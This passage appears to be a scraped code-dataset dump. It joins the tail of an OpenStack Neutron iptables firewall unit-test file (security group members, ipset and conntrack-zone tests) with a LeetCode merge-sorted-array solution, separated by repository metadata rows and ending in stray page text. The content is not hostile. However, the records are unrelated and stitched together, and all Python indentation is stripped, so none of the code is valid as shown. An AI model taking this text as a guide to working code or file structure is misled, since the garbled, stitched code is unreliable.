def _fake_sg_members(self, sg_ids=None):
return {sg_id: copy.copy(FAKE_IP) for sg_id in (sg_ids or [FAKE_SGID])}
def test_update_security_group_members(self):
sg_members = {'IPv4': ['10.0.0.1', '10.0.0.2'], 'IPv6': ['fe80::1']}
self.firewall.update_security_group_members('fake_sgid', sg_members)
calls = [
mock.call.set_members('fake_sgid', 'IPv4',
['10.0.0.1', '10.0.0.2']),
mock.call.set_members('fake_sgid', 'IPv6',
['fe80::1'])
]
self.firewall.ipset.assert_has_calls(calls, any_order=True)
def _setup_fake_firewall_members_and_rules(self, firewall):
firewall.sg_rules = self._fake_sg_rules()
firewall.pre_sg_rules = self._fake_sg_rules()
firewall.sg_members = self._fake_sg_members()
firewall.pre_sg_members = firewall.sg_members
def _prepare_rules_and_members_for_removal(self):
self._setup_fake_firewall_members_and_rules(self.firewall)
self.firewall.pre_sg_members[OTHER_SGID] = (
self.firewall.pre_sg_members[FAKE_SGID])
def test_determine_remote_sgs_to_remove(self):
self._prepare_rules_and_members_for_removal()
ports = [self._fake_port()]
self.assertEqual(
{_IPv4: set([OTHER_SGID]), _IPv6: set([OTHER_SGID])},
self.firewall._determine_remote_sgs_to_remove(ports))
def test_determine_remote_sgs_to_remove_ipv6_unreferenced(self):
self._prepare_rules_and_members_for_removal()
ports = [self._fake_port()]
self.firewall.sg_rules = self._fake_sg_rules(
remote_groups={_IPv4: [OTHER_SGID, FAKE_SGID],
_IPv6: [FAKE_SGID]})
self.assertEqual(
{_IPv4: set(), _IPv6: set([OTHER_SGID])},
self.firewall._determine_remote_sgs_to_remove(ports))
def test_get_remote_sg_ids_by_ipversion(self):
self.firewall.sg_rules = self._fake_sg_rules(
remote_groups={_IPv4: [FAKE_SGID], _IPv6: [OTHER_SGID]})
ports = [self._fake_port()]
self.assertEqual(
{_IPv4: set([FAKE_SGID]), _IPv6: set([OTHER_SGID])},
self.firewall._get_remote_sg_ids_sets_by_ipversion(ports))
def test_get_remote_sg_ids(self):
self.firewall.sg_rules = self._fake_sg_rules(
remote_groups={_IPv4: [FAKE_SGID, FAKE_SGID, FAKE_SGID],
_IPv6: [OTHER_SGID, OTHER_SGID, OTHER_SGID]})
port = self._fake_port()
self.assertEqual(
{_IPv4: set([FAKE_SGID]), _IPv6: set([OTHER_SGID])},
self.firewall._get_remote_sg_ids(port))
def test_determine_sg_rules_to_remove(self):
self.firewall.pre_sg_rules = self._fake_sg_rules(sg_id=OTHER_SGID)
ports = [self._fake_port()]
self.assertEqual(set([OTHER_SGID]),
self.firewall._determine_sg_rules_to_remove(ports))
def test_get_sg_ids_set_for_ports(self):
sg_ids = set([FAKE_SGID, OTHER_SGID])
ports = [self._fake_port(sg_id) for sg_id in sg_ids]
self.assertEqual(sg_ids,
self.firewall._get_sg_ids_set_for_ports(ports))
def test_remove_sg_members(self):
self.firewall.sg_members = self._fake_sg_members([FAKE_SGID,
OTHER_SGID])
remote_sgs_to_remove = {_IPv4: set([FAKE_SGID]),
_IPv6: set([FAKE_SGID, OTHER_SGID])}
self.firewall._remove_sg_members(remote_sgs_to_remove)
self.assertIn(OTHER_SGID, self.firewall.sg_members)
self.assertNotIn(FAKE_SGID, self.firewall.sg_members)
def test_remove_unused_security_group_info_clears_unused_rules(self):
self._setup_fake_firewall_members_and_rules(self.firewall)
self.firewall.prepare_port_filter(self._fake_port())
# create another SG which won't be referenced by any filtered port
fake_sg_rules = self.firewall.sg_rules['fake_sgid']
self.firewall.pre_sg_rules[OTHER_SGID] = fake_sg_rules
self.firewall.sg_rules[OTHER_SGID] = fake_sg_rules
# call the cleanup function, and check the unused sg_rules are out
self.firewall._remove_unused_security_group_info()
self.assertNotIn(OTHER_SGID, self.firewall.sg_rules)
def test_remove_unused_security_group_info(self):
self.firewall.sg_members = {OTHER_SGID: {_IPv4: [], _IPv6: []}}
self.firewall.pre_sg_members = self.firewall.sg_members
self.firewall.sg_rules = self._fake_sg_rules(
remote_groups={_IPv4: [FAKE_SGID], _IPv6: [FAKE_SGID]})
self.firewall.pre_sg_rules = self.firewall.sg_rules
port = self._fake_port()
self.firewall.filtered_ports['tapfake_dev'] = port
self.firewall._remove_unused_security_group_info()
self.assertNotIn(OTHER_SGID, self.firewall.sg_members)
def test_not_remove_used_security_group_info(self):
self.firewall.sg_members = {OTHER_SGID: {_IPv4: [], _IPv6: []}}
self.firewall.pre_sg_members = self.firewall.sg_members
self.firewall.sg_rules = self._fake_sg_rules(
remote_groups={_IPv4: [OTHER_SGID], _IPv6: [OTHER_SGID]})
self.firewall.pre_sg_rules = self.firewall.sg_rules
port = self._fake_port()
self.firewall.filtered_ports['tapfake_dev'] = port
self.firewall._remove_unused_security_group_info()
self.assertIn(OTHER_SGID, self.firewall.sg_members)
def test_remove_all_unused_info(self):
self._setup_fake_firewall_members_and_rules(self.firewall)
self.firewall.filtered_ports = {}
self.firewall._remove_unused_security_group_info()
self.assertFalse(self.firewall.sg_members)
self.assertFalse(self.firewall.sg_rules)
def test_single_fallback_accept_rule(self):
p1, p2 = self._fake_port(), self._fake_port()
self.firewall._setup_chains_apply(dict(p1=p1, p2=p2), {})
v4_adds = self.firewall.iptables.ipv4['filter'].add_rule.mock_calls
v6_adds = self.firewall.iptables.ipv6['filter'].add_rule.mock_calls
sg_chain_v4_accept = [call for call in v4_adds
if call == mock.call('sg-chain', '-j ACCEPT')]
sg_chain_v6_accept = [call for call in v6_adds
if call == mock.call('sg-chain', '-j ACCEPT')]
self.assertEqual(1, len(sg_chain_v4_accept))
self.assertEqual(1, len(sg_chain_v6_accept))
def test_remove_port_filter_with_destroy_ipset_chain(self):
self.firewall.sg_rules = self._fake_sg_rules()
port = self._fake_port()
self.firewall.pre_sg_members = {'fake_sgid': {
'IPv4': [],
'IPv6': []}}
sg_members = {'IPv4': ['10.0.0.1'], 'IPv6': ['fe80::1']}
self.firewall.update_security_group_members('fake_sgid', sg_members)
self.firewall.prepare_port_filter(port)
self.firewall.filter_defer_apply_on()
self.firewall.sg_members = {'fake_sgid': {
'IPv4': [],
'IPv6': []}}
self.firewall.pre_sg_members = {'fake_sgid': {
'IPv4': ['10.0.0.1'],
'IPv6': ['fe80::1']}}
self.firewall.remove_port_filter(port)
self.firewall.filter_defer_apply_off()
calls = [
mock.call.set_members('fake_sgid', 'IPv4', ['10.0.0.1']),
mock.call.set_members('fake_sgid', 'IPv6', ['fe80::1']),
mock.call.get_name('fake_sgid', 'IPv4'),
mock.call.set_name_exists('NIPv4fake_sgid'),
mock.call.get_name('fake_sgid', 'IPv6'),
mock.call.set_name_exists('NIPv6fake_sgid'),
mock.call.destroy('fake_sgid', 'IPv4'),
mock.call.destroy('fake_sgid', 'IPv6')]
self.firewall.ipset.assert_has_calls(calls, any_order=True)
def test_filter_defer_apply_off_with_sg_only_ipv6_rule(self):
self.firewall.sg_rules = self._fake_sg_rules()
self.firewall.pre_sg_rules = self._fake_sg_rules()
self.firewall.ipset_chains = {'IPv4fake_sgid': ['10.0.0.2'],
'IPv6fake_sgid': ['fe80::1']}
self.firewall.sg_members = {'fake_sgid': {
'IPv4': ['10.0.0.2'],
'IPv6': ['fe80::1']}}
self.firewall.pre_sg_members = {'fake_sgid': {
'IPv4': ['10.0.0.2'],
'IPv6': ['fe80::1']}}
self.firewall.sg_rules['fake_sgid'].remove(
{'direction': 'ingress', 'remote_group_id': 'fake_sgid',
'ethertype': 'IPv4'})
self.firewall.sg_rules.update()
self.firewall._defer_apply = True
port = self._fake_port()
self.firewall.filtered_ports['tapfake_dev'] = port
self.firewall._pre_defer_filtered_ports = {}
self.firewall._pre_defer_unfiltered_ports = {}
self.firewall.filter_defer_apply_off()
calls = [mock.call.destroy('fake_sgid', 'IPv4')]
self.firewall.ipset.assert_has_calls(calls, True)
def test_sg_rule_expansion_with_remote_ips(self):
other_ips = ['10.0.0.2', '10.0.0.3', '10.0.0.4']
self.firewall.sg_members = {'fake_sgid': {
'IPv4': [FAKE_IP['IPv4']] + other_ips,
'IPv6': [FAKE_IP['IPv6']]}}
port = self._fake_port()
rule = self._fake_sg_rule_for_ethertype(_IPv4, FAKE_SGID)
rules = self.firewall._expand_sg_rule_with_remote_ips(
rule, port, 'ingress')
self.assertEqual(list(rules),
[dict(list(rule.items()) +
[('source_ip_prefix', '%s/32' % ip)])
for ip in other_ips])
def test_build_ipv4v6_mac_ip_list(self):
mac_oth = 'ffff-ff0f-ffff'
mac_unix = 'FF:FF:FF:0F:FF:FF'
ipv4 = FAKE_IP['IPv4']
ipv6 = FAKE_IP['IPv6']
fake_ipv4_pair = []
fake_ipv4_pair.append((mac_unix, ipv4))
fake_ipv6_pair = []
fake_ipv6_pair.append((mac_unix, ipv6))
fake_ipv6_pair.append((mac_unix, 'fe80::fdff:ffff:fe0f:ffff'))
mac_ipv4_pairs = []
mac_ipv6_pairs = []
self.firewall._build_ipv4v6_mac_ip_list(mac_oth, ipv4,
mac_ipv4_pairs, mac_ipv6_pairs)
self.assertEqual(fake_ipv4_pair, mac_ipv4_pairs)
self.firewall._build_ipv4v6_mac_ip_list(mac_oth, ipv6,
mac_ipv4_pairs, mac_ipv6_pairs)
self.assertEqual(fake_ipv6_pair, mac_ipv6_pairs)
# ensure that LLA is not added again for another v6 addr
ipv62 = 'fe81::1'
self.firewall._build_ipv4v6_mac_ip_list(mac_oth, ipv62,
mac_ipv4_pairs, mac_ipv6_pairs)
fake_ipv6_pair.append((mac_unix, ipv62))
self.assertEqual(fake_ipv6_pair, mac_ipv6_pairs)
class OVSHybridIptablesFirewallTestCase(BaseIptablesFirewallTestCase):
def test__populate_initial_zone_map(self):
self.assertEqual(self._dev_zone_map,
self.firewall.ipconntrack._device_zone_map)
def test__generate_device_zone(self):
# initial data has 1, 2, and 9 in use.
# we fill from top up first.
self.assertEqual(10,
self.firewall.ipconntrack._generate_device_zone('test'))
# once it's maxed out, it scans for gaps
self.firewall.ipconntrack._device_zone_map['someport'] = (
ip_conntrack.MAX_CONNTRACK_ZONES)
for i in range(3, 9):
self.assertEqual(i,
self.firewall.ipconntrack._generate_device_zone(i))
# 9 and 10 are taken so next should be 11
self.assertEqual(11,
self.firewall.ipconntrack._generate_device_zone('p11'))
# take out zone 1 and make sure it's selected
self.firewall.ipconntrack._device_zone_map.pop('e804433b-61')
self.assertEqual(1,
self.firewall.ipconntrack._generate_device_zone('p1'))
# fill it up and then make sure an extra throws an error
for i in range(1, 65536):
self.firewall.ipconntrack._device_zone_map['dev-%s' % i] = i
with testtools.ExpectedException(n_exc.CTZoneExhaustedError):
self.firewall.ipconntrack._find_open_zone()
# with it full, try again, this should trigger a cleanup and return 1
self.assertEqual(1,
self.firewall.ipconntrack._generate_device_zone('p12'))
self.assertEqual({'p12': 1},
self.firewall.ipconntrack._device_zone_map)
def test_get_device_zone(self):
dev = {'device': 'tap1234', 'network_id': '12345678901234567'}
# initial data has 1, 2, and 9 in use.
self.assertEqual(10, self.firewall.ipconntrack.get_device_zone(dev))
# should have been truncated to 11 chars
self._dev_zone_map.update({'12345678901': 10})
self.assertEqual(self._dev_zone_map,
self.firewall.ipconntrack._device_zone_map)
def test_multiple_firewall_with_common_conntrack(self):
self.firewall1 = iptables_firewall.OVSHybridIptablesFirewallDriver()
self.firewall2 = iptables_firewall.OVSHybridIptablesFirewallDriver()
self.assertEqual(id(self.firewall1.ipconntrack),
id(self.firewall2.ipconntrack))
| [
"xjforfuture@163.com"
] | xjforfuture@163.com |
62434b8a6735fc1a9f7355464680ab37f69140cc | 4ac687bc28b9f5cf7f822e9d4c0db8b46fe363b3 | /88-Merge_Sorted_Array.py | 648b3e7fbf941c1b8741ec21892efe0d755d71da | [
"MIT"
] | permissive | QuenLo/LeetCode-share | b1e75e02e1dfe85be44ddb0ae1f4345353b0b569 | ce861103949510dc54fd5cb336bd992c40748de2 | refs/heads/master | 2021-12-23T11:23:09.111711 | 2021-11-15T18:54:46 | 2021-11-15T18:54:46 | 131,681,273 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,539 | py | # Time complexity : O(n + m)
# Space: O(m)
class Solution:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
if n < 1:
return
if (m) < 1:
nums1[:] = nums2[:]
return
nums1_copy = nums1[:m]
l, k = 0, 0
for p in range( m+n ):
if( (l < m and k < n and nums1_copy[l] <= nums2[k]) or k >= n ):
nums1[p] = nums1_copy[l]
l += 1
else:
nums1[p] = nums2[k]
k += 1
class SolutionII:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
if n < 1:
return
if (m) < 1:
nums1[:] = nums2[:]
return
nums1_copy = nums1[:]
l, k = 0, 0
while l < (m) or k < n:
if ( k >= n ):
nums1[l+k] = nums1_copy[l]
l += 1
elif ( l >= (m) ):
nums1[l+k] = nums2[k]
k+= 1
elif ( nums1_copy[l] <= nums2[k] ):
nums1[l+k] = nums1_copy[l]
l += 1
elif( nums1_copy[l] > nums2[k] ):
nums1[l+k] = nums2[k]
k += 1
| [
"noreply@github.com"
] | QuenLo.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.